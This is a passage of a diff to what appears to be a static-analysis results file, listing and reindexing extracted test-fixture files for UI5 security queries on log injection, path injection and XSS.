"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 178 } @@ -7702,7 +7702,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 179 } @@ -7728,7 +7728,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 180 } @@ -7754,7 +7754,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 181 } @@ -7780,7 +7780,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 182 } @@ -7806,7 +7806,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 183 } @@ -7832,7 +7832,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 184 } @@ -7858,7 +7858,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 185 } @@ -7910,7 +7910,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", "uriBaseId" : "%SRCROOT%", "index" : 187 } @@ -7936,7 +7936,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 188 } @@ -7962,7 +7962,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 189 } @@ -7988,7 +7988,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 190 } @@ -8014,7 +8014,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 191 } @@ -8040,7 +8040,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 192 } @@ -8066,7 +8066,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 193 } @@ -8092,7 +8092,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 194 } @@ -8118,7 +8118,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", "uriBaseId" : "%SRCROOT%", "index" : 195 } @@ -8222,7 +8222,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 199 } @@ -8248,7 +8248,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 200 } @@ -8274,7 +8274,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", "uriBaseId" : "%SRCROOT%", "index" : 201 } @@ -8300,7 +8300,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 202 } @@ -8326,7 +8326,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 203 } @@ -8352,7 +8352,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", "index" : 204 } @@ -8456,7 +8456,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 208 } @@ -8482,7 +8482,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 209 } @@ -8508,7 +8508,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 210 } @@ -8534,7 +8534,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 211 } @@ -8560,7 +8560,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 212 } @@ -8612,7 +8612,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 214 } @@ -8638,7 +8638,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 215 } @@ -8664,7 +8664,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 216 } @@ -8742,7 +8742,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 219 } @@ -8768,7 +8768,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 220 } @@ -8820,7 +8820,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 222 } @@ -8846,7 +8846,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 223 } @@ -8872,7 +8872,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 224 } @@ -8898,7 +8898,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 225 } @@ -8924,7 +8924,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 226 } @@ -8950,7 +8950,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 227 } @@ -8976,7 +8976,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 228 } @@ -9106,7 +9106,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 233 } @@ -9132,7 +9132,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 234 } @@ -9158,7 +9158,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 235 } @@ -9184,9 +9184,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 0 + "index" : 236 } } } ], @@ -9210,9 +9210,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", "uriBaseId" : "%SRCROOT%", - "index" : 236 + "index" : 237 } } } ], @@ -9238,7 +9238,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 237 + "index" : 238 } } } ], @@ -9262,9 +9262,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", "uriBaseId" : "%SRCROOT%", - "index" : 238 + "index" : 0 } } } ], @@ -12278,7 +12278,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 354 } @@ -12304,7 +12304,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 355 } @@ -12330,7 +12330,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", "index" : 356 } @@ -12356,7 +12356,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 357 } @@ -12382,7 +12382,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 358 } @@ -12408,7 +12408,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 359 } @@ -12434,7 +12434,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 360 } @@ -12460,7 +12460,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", "uriBaseId" : "%SRCROOT%", "index" : 361 } @@ -12486,7 +12486,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", "index" : 362 } @@ -12538,7 +12538,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 364 } @@ -12564,7 +12564,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 365 } @@ -12980,7 +12980,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 381 } @@ -13110,7 +13110,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", "uriBaseId" : "%SRCROOT%", "index" : 386 } @@ -13136,7 +13136,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 387 } @@ -13292,7 +13292,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 393 } @@ -13318,7 +13318,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", "uriBaseId" : "%SRCROOT%", "index" : 394 } @@ -13396,7 +13396,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", "index" : 397 } @@ -13422,7 +13422,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 398 } @@ -13526,215 +13526,215 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 404 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 405 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 408 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 409 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 